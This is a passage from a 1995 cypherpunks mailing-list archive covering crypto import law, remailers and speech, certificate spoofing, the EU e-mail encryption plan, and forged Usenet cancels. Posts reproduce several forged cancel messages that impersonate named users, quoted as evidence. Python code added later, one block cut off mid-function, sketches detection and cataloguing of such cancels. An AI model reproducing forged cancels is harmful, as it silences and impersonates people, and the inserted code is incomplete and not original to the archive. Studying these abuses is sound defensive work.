the highly publicized seizure of some large number of crates of Chinese or
Russian 7.39 mm ammo...it was alleged that improper licenses had been
gotten, or had been forged, or some other such crime. After Feinswine got
her media attention, calling the imports "shocking," it was later admitted
that the warehouse contents were duly licensed and the news was carried on
page C23 that the importers were kosher.)

(As with most laws, a welter of competing laws are involved. The Gun
Control Act of 1968 is involved, as is the McClure-Volkmer Act, etc. And
during the recent anti-gun hysteria, new laws were passed about the
importation of ammunition, clips, etc.)

As far as other munitions go, try "importing" a French Exocet, a Russian
Strelka, or any number of other "munitions" items.

Given that crypto is classified as "munitions" for the purpose of export
control (including the ITARs), it would not surprise me in the least if the
same sorts of restrictions on imports of the aforementioned munitions are
not applied to at least some crypto imports. If not now, soon. (Given that
many folks are talking about a strategy that has been apparent for many
years: develop core crypto in less hostile environments than the U.S.)

I can't cite a specific law affecting crypto imports at this time--and I
doubt any crypto products have been affected so far--but clearly there are
restrictions on imports of ammunition, guns, missiles, jet fighters,
and--maybe soon--on "crypto munitions."

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 1 Oct 95 22:17:33 PDT
To: cypherpunks@toad.com
Subject: The Free Speech Implications of Remailers
Message-ID: <ac94c16801021004f486@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've seen a bunch of messages in this group, and on Usenet, about what can
be done to track down and punish (or otherwise stop) the posters of racist,
fascist, inflammatory posts. This in light of several recent widespread
postings of racist screeds. People are doing traceroute analyses, asking
what can be done, proposing to sue those who send them unwanted spewage,
etc.

Well, guess what? The very technologies we have been so central in
deploying are the technologies that make _conventional_ means of
controlling distasteful material so hard.

Think about it. Remailers mean the people whose speech we abhor will be
untraceable. (I of course mean Chaum-style mixes, and ecologies of mixes,
not the "almost mixes" we have now, where a motivated operator can screen
posts, stop spams, etc.)

All is not lost, in the long run, as "digital postage" schemes may develop.
This will reduce Net-wide spamming, though not have an effect on a lot of
"distasteful" speech. In that regard, reputation filters will help. A
person could insist that he will only read messages from persons or nyms he
knows.

(Sure, it doesn't stop the problem of the _mail volume_ itself, but first
things first. The current delivery paradigm is unlike the paid-transport
system of the various mail delivery systems.)

Crypto anarchy means the racists, sexists, speciesists, and other "ists"
cannot be muzzled. I call this a good thing. It's why I'm here.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 1 Oct 95 23:01:58 PDT
To: cypherpunks
Subject: Bryn Mawr talk TODAY on Enigma and Its Effect on the Computing Age
Message-ID: <9510020601.AA18855@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: Dave Farber <farber@central.cis.upenn.edu> and "Steven"

Bi-Co Mathematics Talk Series at Bryn Mawr College

Charles Terry: "The Cryptography of the Enigma Machine and Its Effect on
the Computing Age"

Monday, October 2, 1995, Talk at 4pm in room 338, Tea at 3:30 in room 355
Bryn Mawr College, Park Science Center
------------------------------

Steven

P.S. I was told he obtained permission to bring an authentic machine to the
talk and will demonstrate its operation afterwards.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbyrd@tiac.net (Jim Byrd)
Date: Sun, 1 Oct 95 17:16:31 PDT
To: cypherpunks@toad.com
Subject: More forged cancels
Message-ID: <44n926$2dj@sundog.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


These were found in control.  Note that they all have the string
"CANCELLED", and all are timestamped 17:56.

The first one is definitely forged.  The others look like they
probably are.  I asked Jukka Santala, and he didn't issue that
forgery.  I asked Joel Rubin, and haven't gotten a response yet.
I haven't asked the other people yet.

So I'll go ahead and post this, crossposted to the affected groups.

It looks like the Cancelschnauzer is hitting lots of groups.

A note to the canceller:  if you try to cancel this, I'll just put it
back.

-----------------begin control message
Path:
sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!mn6.swip.net!seunet!news2..swip..net!plug..ne
ws.pipex.net!pipex!tank.news.pipex.net!pipex!usenet.eel.ufl.edu!news.gmi..edu!msunews!netnew
s.upenn.edu!ts7-28.upenn.edu!user
From: 73323.603@compuserve.com
Newsgroups: soc.culture.german,soc.culture.jewish
Subject: cmsg cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: The National Alliance
Message-ID: <cancel.73323.603-3009951517290001@ts7-28.upenn.edu>
NNTP-Posting-Host: ts7-28.upenn.edu
Approved: 73323.603@compuserve.com
Control: cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
X-Cancelled-By: 73323.603@compuserve.com
Lines: 1

CANCELLED.

----end control message

These others are suspicious, the Santala cancel is definitely forged.
I don't have the original posts of any of these, I suspect they are
all related to National Alliance.

------------rest of the cancels:
Path:
sundog.tiac.net!news.kei.com!news.mathworks.com!tank.news.pipex.net!pipex!in2..uu..net!howla
nd.reston.ans.net!ix.netcom.com!netnews
From: jmrubin@ix.netcom.com (Joel Rubin)
Newsgroups:
soc.culture.german,soc.culture.jewish,rec.radio.shortwave,alt.2600
Subject: cmsg cancel <44lfpn$qoh@ixnews7.ix.netcom.com>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: Netcom
Message-ID: <cancel.44lfpn$qoh@ixnews7.ix.netcom.com>
NNTP-Posting-Host: ix-sf17-08.ix.netcom.com
Approved: jmrubin@ix.netcom.com (Joel Rubin)
Control: cancel <44lfpn$qoh@ixnews7.ix.netcom.com>
X-Cancelled-By: jmrubin@ix.netcom.com (Joel Rubin)
Lines: 1

CANCELLED.

========
Path:
sundog.tiac.net!news.sprintlink.net!in2.uu.net!sun4nl!xs4all!mail
From: nobody@alpha.c2.org (Anonymous)
Newsgroups:
mail.cypherpunks,alt.privacy.anon-server,alt.2600,alt.stop.spamming,alt..stop-
spamming
Subject: cmsg cancel <199510010427.VAA28730@infinity.c2.org>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: Mail to Usenet Gateway at Utopia
Message-ID: <cancel.199510010427.VAA28730@infinity.c2.org>
NNTP-Posting-Host: utopia.hacktic.nl
Approved: nobody@alpha.c2.org (Anonymous)
Control: cancel <199510010427.VAA28730@infinity.c2.org>
X-Cancelled-By: nobody@alpha.c2.org (Anonymous)
Lines: 1

CANCELLED.

========
Path:
sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!sunic!sunic.sunet.se!news..funet..fi!zippo..uwa
sa.fi!!jsantala
From: jsantala@walli.uwasa.fi (Jukka Santala)
Newsgroups: alt.2600,news.admin.net-abuse.misc
Subject: cmsg cancel <tlqbws0p37xU084yn@walli.uwasa.fi>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: And you think we're organized?
Message-ID: <cancel.tlqbws0p37xU084yn@walli.uwasa.fi>
NNTP-Posting-Host: walli.uwasa.fi
Approved: jsantala@walli.uwasa.fi (Jukka Santala)
Control: cancel <tlqbws0p37xU084yn@walli.uwasa.fi>
X-Cancelled-By: jsantala@walli.uwasa.fi (Jukka Santala)
Lines: 1

CANCELLED.

========
Path:
sundog.tiac.net!news.texas.net!newshost.comco.com!news.tamu.edu!news.utdallas..edu!news01..
aud.alcatel.com!gatech!news.mathworks.com!zombie.ncsc.mil!simtel!news.sprintlink..net!in2..uu..
net!sunic!mn6.swip.net!seunet!news2.swip.net!plug.news.pipex.net!pipex!tank..news..pipex..net!pi
pex!news1.digital.com!nntp-hub2.barrnet.net!nntp-ucb.barrnet.net!well!usenet
From: themed@well.com
Newsgroups: alt.2600
Subject: cmsg cancel <44mknk$1m0@nkosi.well.com>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: The Whole Earth 'Lectronic Link, Sausalito, CA
Message-ID: <cancel.44mknk$1m0@nkosi.well.com>
NNTP-Posting-Host: sf-tty7-ppp.well.com
Approved: themed@well.com
Control: cancel <44mknk$1m0@nkosi.well.com>
X-Cancelled-By: themed@well.com
Lines: 1

CANCELLED.

========
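
The pattern noted in the post above (several purported senders, one identical body string, one identical timestamp) can be checked mechanically over a batch of control messages. This is an added example, not part of the original post: the sample messages, addresses and hostnames are constructed, and the threshold of three distinct senders is an assumption.

```python
import re
from collections import defaultdict
from email import message_from_string
from email.utils import parseaddr


def _sample(sender, target, date, path, body="CANCELLED."):
    """Build one constructed cancel control message (not real traffic)."""
    return (
        f"Path: {path}\n"
        f"From: {sender}\n"
        "Newsgroups: example.test\n"
        f"Subject: cmsg cancel {target}\n"
        f"Date: {date}\n"
        f"Message-ID: <cancel.{target[1:]}\n"
        f"Control: cancel {target}\n"
        f"X-Cancelled-By: {sender}\n"
        "Lines: 1\n"
        "\n"
        f"{body}\n"
    )


# Constructed input: three cancels that share a timestamp and body but claim
# different authors, one unrelated cancel, and one non-cancel control message.
SAMPLES = [
    _sample("alice@site-a.example (Alice Example)", "<a1@site-a.example>",
            "Sun, 1 Oct 1995 17:56 GMT",
            "reader.example!hub.example!site-a.example!netnews"),
    _sample("bob@site-b.example", "<b7@site-b.example>",
            "Sun, 1 Oct 1995 17:56 GMT",
            "reader.example!hub.example!site-b.example!usenet"),
    _sample("carol@site-c.example (Carol Example)", "<c3@site-c.example>",
            "Sun, 1 Oct 1995 17:56 GMT",
            "reader.example!other.example!site-c.example!user"),
    _sample("dave@site-d.example", "<d9@site-d.example>",
            "Sun, 1 Oct 1995 09:12 GMT",
            "reader.example!hub.example!site-d.example!usenet",
            body="Posted to the wrong group."),
    "From: admin@site-e.example\nControl: newgroup example.new\n\n\n",
]

CANCEL_RE = re.compile(r"^cancel\s+(<[^>\s]+>)\s*$")


def parse_cancel(raw):
    """Return the fields of a cancel control message, or None if not a cancel."""
    msg = message_from_string(raw)
    match = CANCEL_RE.match(msg.get("Control", "").strip())
    if not match:
        return None
    path = msg.get("Path", "").strip().split("!")
    return {
        "target": match.group(1),
        # The claimed author only; nothing in the message authenticates it.
        "sender": parseaddr(msg.get("From", ""))[1].lower(),
        # Collapse whitespace so equal timestamps compare equal as strings.
        "date": " ".join(msg.get("Date", "").split()),
        "body": msg.get_payload().strip(),
        # Rightmost Path entries are closest to where the article was injected;
        # the last one is normally a user name, the one before it a host.
        "entry_host": path[-2] if len(path) >= 2 else "",
    }


def suspicious_batches(raws, min_senders=3):
    """Group cancels by (timestamp, body) and report groups that claim to come
    from at least min_senders different authors."""
    groups = defaultdict(list)
    for raw in raws:
        cancel = parse_cancel(raw)
        if cancel is not None:
            groups[(cancel["date"], cancel["body"])].append(cancel)

    batches = []
    for (date, body), cancels in groups.items():
        senders = sorted({c["sender"] for c in cancels})
        if len(senders) >= min_senders:
            batches.append({
                "date": date,
                "body": body,
                "senders": senders,
                "targets": sorted(c["target"] for c in cancels),
                "entry_hosts": sorted({c["entry_host"] for c in cancels}),
            })
    return batches


if __name__ == "__main__":
    for batch in suspicious_batches(SAMPLES):
        print(batch)
```

A flagged batch is a lead rather than proof: confirming a forgery still means asking the purported authors, as the post does.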






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Oct 95 00:37:33 PDT
To: Greg Miller <gmiller@grendel.ius.indiana.edu>
Subject: Re: Spoofing HTTP server certificates
Message-ID: <199510020737.AAA27256@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 AM 10/2/95 -0400, Greg Miller <gmiller@grendel.ius.indiana.edu> wrote:
>	Since there has been a lot of talk about the "man in the middle" 
>attack on the secure web servers, has anyone actually considered the 
>processing time required to fake a certificate from scratch?
>	I haven't really familiarized myself with how the certificates 
>are generated, etc, but it's my understanding that they are signed with RSA.

While I haven't seen Verisign's various public keys posted to the net,
and didn't see them anywhere on their web page, I assume they're at least
508 bits long, and the ones for better-than-persona certification
(or at least Class 3) ought to be ~1024 bits long, unless they're limiting
themselves to 512 bits to support software that's limited by ITAR stupidity
(which would be a shame, but is certainly possible.)

For the moment, breaking a 512-bit key remains hard, though maybe within the
NSA's reach.  It's probably one of the next big factoring challenges after the
RSA-130 number is taken out by the General Number Field Sieve folks.
The better fake, which is much more possible, is to build a chain of
certifications (trivial) and convince your victim to accept them instead of
the real ones
(more doable, especially if some vendor's software isn't written carefully,
or is written carefully but requires the user to think about what he's reading.)

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ccshag@cclabs.missouri.edu (Paul 'Shag' Walmsley)
Date: Sun, 1 Oct 95 18:17:17 PDT
To: cypherpunks@toad.com
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44ncdp$5gt@news.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


Joel Rubin (jmrubin@ix.netcom.com) wrote:
: In article <44leli$s38@ixnews6.ix.netcom.com>, VMARX@ix.netcom.com 
: says...
: >
: >In <44kgtb$88i@news.rain.org> rivaud@rain.org writes: 
: >>
: >>This is a multi-part message in MIME format.
: >>
: >>---------------------------------17921121372935
: >>Content-Transfer-Encoding: 7bit
: >>Content-Type: text/plain; charset=us-ascii
: >>
: >>Attached to this is, (I hope), the header text from an unsolicited
: >e-mail 
: >>message I received.  The return address does not work.  WHY? How can I
: >
: >>inform the sender that I hope to never receive their material again?
: >>
: >>I tried "reply-all" through Eudora, but my reply got bounced back to
: >me 
: >>as undeliverable.
: >>
: >>I have removed the content of the original message. I don't know why
: >it 
: >>was sent to me, but it contained material that I found offensive.
: >>
: >>Any help, or words of wisdom and enlightenment would be appreciated. 
: >>Information would be nice too.  
: >>
: >
: >I got the SAME damned letter.  I don't know who the fascist bastard is
: >that sent it to me, but I sent him a reply ALSO telling him to stop
: >sending it to me (he sent me 3 copies) and I couldn't connect to his
: >server.
: >

: I don't know if this is connected but I notice that a "let's use these 
: big lie tactics on Usenet" posting allegedly from the National 
: Alliance's Compuserve address seems to have somehow gone through the 
: University of Pennsylvania.

:      "Things are seldom what they seem.
:       Skim milk masquerades as cream."

The E-mails seem to be coming from different sendmails; the copy I got
supposedly originated from slip-1.slip.net and bounced through a few
French sites.  Perhaps s/he's hedging their bets?


--

- Paul "Shag" Walmsley <ccshag@cclabs.missouri.edu>
  "Praise and blame alike mean nothing." -- Virginia Woolf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Miller <gmiller@grendel.ius.indiana.edu>
Date: Sun, 1 Oct 95 21:40:33 PDT
To: cypherpunks@toad.com
Subject: Spoofing HTTP server certificates
Message-ID: <Pine.3.89.9510020002.A7800-0100000@grendel.ius.indiana.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Since there has been a lot of talk about the "man in the middle" 
attack on the secure web servers, has anyone actually considered the 
processing time required to fake a certificate from scratch?
	I haven't really familiarized myself with how the certificates 
are generated, etc, but it's my understanding that they are signed with RSA.

	The few recent factorings of RSA keys have shown that brute force 
attacks are feasible with distributed processing.  Since these projects 
were done "just for the fun of it", wouldn't it seem likely that someone 
(or some people) would take the time and effort to factor the certificate 
signing key?  After all, it would actually be worth something.

gmiller@grendel.ius.indiana.edu
http://www.ius.indiana.edu/~gmiller/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 1 Oct 95 22:16:19 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: User-Specified Trusted CAs in Netscape (Was: Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <199510012043.NAA06905@illilouette.Eng.Sun.COM>
Message-ID: <199510020516.BAA21934@giane.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Soley writes:
> (3) Netscape is making the problem worse (yes, worse) in the next release
> by allowing the user to specify their own list of trusted CAs.  (I will
> elaborate on this unpopular view below.)
[...]
> Re: problem 3, about how allowing the user to specify their own list of
> trusted CAs is bad.  
[...]
> it.  Even Mary Moderately-Savvy might be tricked into doing it on the
> false assumption that it would only affect security for the naughty
> pictures site (that she may not care about), and not affect security for
> her stock-broker.  This false assumption might be based on the fact
> that the (legitimate) stock-broker uses a different CA.

You seem to be overstating your point a bit. The real problem here, AFAICS,
is that the proposed protocol in the software wouldn't allow sufficiently 
fine-grained control over the certification authority approval. The user
should be able to specify the conditions under which a CA is to be trusted,
not simply give a blanket approval or rejection. 

It looks as though a set of trusted (CA, site) pairs would suffice. 
How about it, Netscape ?  Give the user the opportunity to say "I trust 
certificates from Alfie's World of Key Certification regarding keys for
interactions with Elvira's Copier Shack."

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 1 Oct 95 22:26:39 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <9510020525.AA08599@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> belief that I need a US crypto import license, which I can't persuade

>There is no such animal under US law.  Note however (1) you need export

Perhaps they're worried about contributing to patent infringement?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 1 Oct 95 17:05:45 PDT
To: cypherpunks@toad.com
Subject: Re: DNS Security ( was Re: NetScape's dependence upon RSA down...)
In-Reply-To: <Pine.SUN.3.91.951001135411.12454J-100000@cybercash.com>
Message-ID: <199510020005.CAA26574@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> For information on how to acquire TIS/DNSSEC retrieve the file
> /pub/DNSSEC/README on the host ftp.tis.com via anonymous FTP.

Does anyone know if this is available outside the United States?  If
it is, please let me know.  I'd like to add a link to it from the WWW
pages at http://www.cs.hut.fi/crypto.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 1 Oct 95 23:19:01 PDT
To: rivaud@rain.org
Subject: Re: WHERE did this come from?
Message-ID: <v02130505ac9508c98b3e@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:38 9/30/95, rivaud@rain.org wrote:
>Attached to this is, (I hope), the header text from an unsolicited e-mail
>message I received.  The return address does not work.  WHY? How can I
>inform the sender that I hope to never receive their material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated.
>Information would be nice too.
>
>Thanks.

This is a KNOWN SPAM (it is currently being talked about in the Net-SPAM
Usenet Newsgroup). It has been coming from 3 sites (one in Italy, one in
France, and one in Germany). The national Police in all 3 countries (as
well as the FBI) are apparently investigating it. To track the situation
monitor this Web Page (Which should be Globally Accessible):

http://www.panix.com/~lan/crusader






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grigor42@aurora.eexi.gr
Date: Sun, 1 Oct 95 18:21:15 PDT
To: cypherpunks@toad.com
Subject: Re:WHERE did this come from?
Message-ID: <199510020118.DAA26188@info.forthnet.gr>
MIME-Version: 1.0
Content-Type: text/plain


This asshole's spam reached Greece too - how do you deal with such crap?
(Yes I'm a newbie but I'm interested in crypto - so little about it reaches
my country)
Thanx
G.A.M.

+--------------------------------------------------+
| grigor42@eexi.gr         |    So long and thanks | 
| Grigoris A. Miliaresis   |     for all the fish. | 
| Athens                   |                 DNA   |
| Greece                   |                       |
|               -INFO WANTS 2 B FREE -             |
+--------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: orbit@ix.netcom.com (Michael R. Grabois)
Date: Sun, 1 Oct 95 22:13:04 PDT
Subject: Re: More forged cancels
In-Reply-To: <44n926$2dj@sundog.tiac.net>
Message-ID: <44nmd0$q13@ixnews6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 01 Oct 1995 23:45:24 GMT, jbyrd@tiac.net (Jim Byrd) wrote:

[snip]

>-----------------begin control message
>Path:
>sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!mn6.swip.net!seunet!news2..swip..net!plug..ne
>ws.pipex.net!pipex!tank.news.pipex.net!pipex!usenet.eel.ufl.edu!news.gmi..edu!msunews!netnew
>s.upenn.edu!ts7-28.upenn.edu!user
>From: 73323.603@compuserve.com
>Newsgroups: soc.culture.german,soc.culture.jewish
>Subject: cmsg cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>Date: Sun, 1 Oct 1995 17:56 GMT
>Organization: The National Alliance
>Message-ID: <cancel.73323.603-3009951517290001@ts7-28.upenn.edu>
>NNTP-Posting-Host: ts7-28.upenn.edu
>Approved: 73323.603@compuserve.com
>Control: cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>X-Cancelled-By: 73323.603@compuserve.com
>Lines: 1

>CANCELLED.

>----end control message

Does this mean that the cancel came from the Compuserve account?
Forging cancel notices is definitely against CIS rules, as is
unsolicited e-mail. I've already talked to a sysop there about it, and
he said he'd pass it along to the CIS Security folks.

If nothing else, that may get his account revoked. Hey, small
victories.



        Michael R. Grabois    | orbit@ix.netcom.com
        Houston, TX           | CI$: 74737,2600
-------------------------------------------------------
    Gravity. It's not just a good idea, it's the law.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 2 Oct 95 01:11:28 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: C2 Evaluation of Win NT (was: Hack Microsoft?)
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <199510020811.EAA28491@giane.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray writes:
>    Microsoft recently got C2-security status approved for Windows NT by
> the National Computer Security Center, a division of the NSA. 

Do you have a pointer to a source for this information ?  I've been searching
through NCSC Orange Book stuff and M$'s web server, to no avail. 
http://www.microsoft.com/BackOffice/techbriefs/tech4000.htm, the Win NT Server
3.5 Technology Brief, only says that NT was in the final evaluation phase as
of June 1995. 

I haven't been able to find on-line copies of any NCSC Product Evaluation
Bulletins, or a current Evaluated Products List. The closest I've seen is
http://www.itd.nrl.navy.mil:80/ITD/5540/xtp1/epl.html, which lists items
evaluated or under evaluation, at the A and B levels.

The status of NT's evaluation for C2 is a recurrent topic on the firewalls
list, so I'm surprised I haven't seen the final approval mentioned there.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 2 Oct 95 02:57:50 PDT
To: cypherpunks@toad.com
Subject: European Email Police (fwd)
Message-ID: <Pine.SUN.3.91.951002055654.18957A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


This may be of interest to cypherpunk folk (yanked from the UK
Electronic Telegraph:  http://www.telegraph.co.uk).

P. Madden

===============================================================

The Electronic Telegraph  Monday 2 October 1995  The Front Page


Plan to police e-mail seems certain to fail

By Adrian Berry, Science Correspondent

A EUROPEAN Commission plan to police the use of secret codes in
electronic mail appears certain to fail. To detect criminals, the
commission is seeking legal powers to prevent people from using
secret codes on the Internet which it cannot crack.

Nature magazine says this would "effectively end the Internet's
status as an unregulated medium for the free flow of
information".

The plan would require any person or company encrypting e-mail
messages to leave the "secret keys" to read them in the hands of
a law enforcement agency.

But Dr Peter Lammer, managing director of Sophos, the
Abingdon-based supplier of encryption software, said: "This plan
would never work because people wishing to evade it could
legitimately use layers of encryption.

"Suppose I send a secret file. I would first encrypt it with my
own system. I would then obey the law by encrypting it a second
time with the European-approved system.

"Even when the government agency had decrypted the message using
the keys they had been given, they would still find that the
message was totally unintelligible because of the second layer of
encryption."

In France, it is illegal to use any kind of encryption, and
police can arrest the authors of any e-mail which they cannot
understand.

Codes are used by a vast range of financial companies, sending
money orders and sensitive commercial details.


Reply to Electronic Telegraph - et@telegraph.co.uk 

Electronic Telegraph is a Registered Service Mark of The Telegraph plc 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 2 Oct 95 04:41:22 PDT
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <modemacDFr0qB.IyK@netcom.com>
Message-ID: <6FBccD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <modemacDFr0qB.IyK@netcom.com>, Rt. Rev. Modemac writes:
>Dr. Dimitri Vulis (dlv@bwalk.dm.com) wrote:
>: The National Alliance are not the first despicable racist net.abusers who forge
>: cancels for other people's articles critical of them on n.a.n-a.m. Ken Arromdee
>: has condemned one such forger, the graduate student Pyotr Vorobiev from Lehigh
>: University's Mechanical Engineering and Mechanics Department (+1 610 758 4100)
>
>When Scientology began cancelling posts by their critics on
>alt.religion.scientology, Homer Wilson Smith wrote a program called
>"Lazarus" to track for cancels.  The idea is simple: whenever a cancel
>message appears, Lazarus announces it on the newsgroup.
>
>Mayhap a Lazarus-type program can be put into effect on
>news.admin.net-abuse.misc?

Many other newsgroups are affected by such net.abuse (Vorobiev-style forged
cancels based on contents); I just saw some messages on forged cancels in
soc.culture.jewish and soc.culture.german. I think running Lazarus-like
programs in _all_ newsgroups would be an extremely Good Idea.

Alas, the time when people used to contribute their time and equipment for
the public good of the net seems to be over. Perhaps I'm just dreaming; or
perhaps Dave Hayes will like the following idea enough to implement it.

Also, I think it's a matter of time before some Cancelpoodle figures to put
'light' into the Path: of its Vorobiev-style forged cancels; then they will not
be seen by lightlink.com where Lazarus now runs. This needs to be addressed.

Anyway, here are my thoughts on this proposal:

There would be a collection (at least 5 or 6) of cancel-watchers (sort of like
the daemons that now watch misc.test) all over the world. They should be
well-connected (preferably, one hop away from sites like uunet,
howland.reston.ans.net, etc).

Each watcher would look at incoming articles in "control", and whenever it sees
a cancel, it would replace its own uucp name in the path by something like
ellipsis (to keep it confidential) and forward the cancel to a central
cataloguer (singly or in batches). E.g., if a watcher at xyz123.uucp saw a
cancel with the header

Path: xyz123!howland.reston.ans.net!someplace

it would send it to the cataloguer with the Path: replaced by

Path: ...!howland.reston.ans.net!someplace

The cataloguer would wake up every few hours (for example), group the collected
cancels by message-ids of the cancelled articles, and e-mail reports to the
(distinct) addresses (other than "usenet@*" or "news@*") mentioned in the
"From:", "Sender:", "Authorized:", and "X-Cancelled-By:" headers, and quoting
the entire cancel and the Path's as seen at different sites by the
cancel-watchers. This way, if the cancel is forged, its author will learn
within hours that it has been fraudulently cancelled and will automatically
receive enough Path: samples from all over the world to see where it was
posted, by comparing the Path headers in several copies of cancels.

A user or an entire site should be able to "opt out" of having its cancels
reported by sending a command to the cataloguer.

There should be a limit of, say, no more than 100 such notifications sent to a
site in one batch (to prevent too much traffic in the event of really massive
forged cancellation).

I don't have the resources to do this right now, but I would be happy if some
civic-minded netters took this proposal and ran with it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
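
The watcher and cataloguer steps proposed in the message above, as an added example that is not part of the original post or of Lazarus. All function names, the `*.example` hosts and the sample articles are constructed for illustration; the cancelled message-id is assumed to be taken from the `Control: cancel <id>` header.

```python
from collections import defaultdict
from email import message_from_string
from email.utils import getaddresses

REPORT_HEADERS = ("From", "Sender", "Authorized", "X-Cancelled-By")  # as listed in the post
SKIPPED_LOCAL_PARTS = ("usenet", "news")  # role accounts the post excludes
MAX_PER_SITE = 100                        # per-batch cap suggested in the post


def anonymize_path(path, watcher_name):
    """Watcher step: hide the watcher's own leading hop behind '...'."""
    hops = path.split("!")
    if hops and hops[0] == watcher_name:
        hops[0] = "..."
    return "!".join(hops)


def cancelled_id(msg):
    """Message-ID named by 'Control: cancel <id>', or None if not a cancel."""
    parts = (msg.get("Control") or "").split()
    if len(parts) == 2 and parts[0].lower() == "cancel":
        return parts[1]
    return None


def watcher_forward(raw_article, watcher_name):
    """Return the cancel as a watcher would forward it, or None if not a cancel."""
    msg = message_from_string(raw_article)
    if cancelled_id(msg) is None:
        return None
    path = anonymize_path(msg.get("Path", ""), watcher_name)
    del msg["Path"]
    msg["Path"] = path
    return msg.as_string()


def report_addresses(msg):
    """Distinct addresses from the report headers, minus usenet@* and news@*."""
    values = [v for h in REPORT_HEADERS for v in msg.get_all(h, [])]
    found = []
    for _name, addr in getaddresses(values):
        addr = addr.lower()
        local = addr.partition("@")[0]
        if "@" in addr and local not in SKIPPED_LOCAL_PARTS and addr not in found:
            found.append(addr)
    return found


def common_tail(paths):
    """Hops shared by the right-hand end of every Path: the route nearest the
    point where the cancel entered the net."""
    tail = []
    for hops in zip(*(p.split("!")[::-1] for p in paths)):
        if len(set(hops)) != 1 or hops[0] == "...":
            break
        tail.append(hops[0])
    return "!".join(reversed(tail))


def catalogue(forwarded, opted_out=frozenset()):
    """Cataloguer step: group cancels by cancelled message-id and build one
    report per (address, cancelled article). opted_out holds addresses or sites."""
    groups = defaultdict(list)
    for raw in forwarded:
        msg = message_from_string(raw)
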